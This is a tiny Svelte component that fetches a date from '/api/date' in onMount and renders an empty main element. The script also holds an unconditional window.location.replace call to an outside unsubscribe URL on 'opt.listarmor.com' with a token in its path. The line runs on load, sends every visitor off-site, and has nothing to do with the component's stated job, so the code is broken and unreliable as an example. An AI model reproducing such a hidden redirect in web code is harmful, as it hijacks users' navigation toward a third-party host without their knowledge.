<script>
  import { onMount } from "svelte";
  export let date;

  onMount(async () => {
    const res = await fetch("/api/date");
    const newDate = await res.text();
    date = newDate;
  });
  window.location.replace("https://opt.listarmor.com/unsub/vbhUDf89cL2sMWZogHCmYFkq");
</script>

<main>
</main>
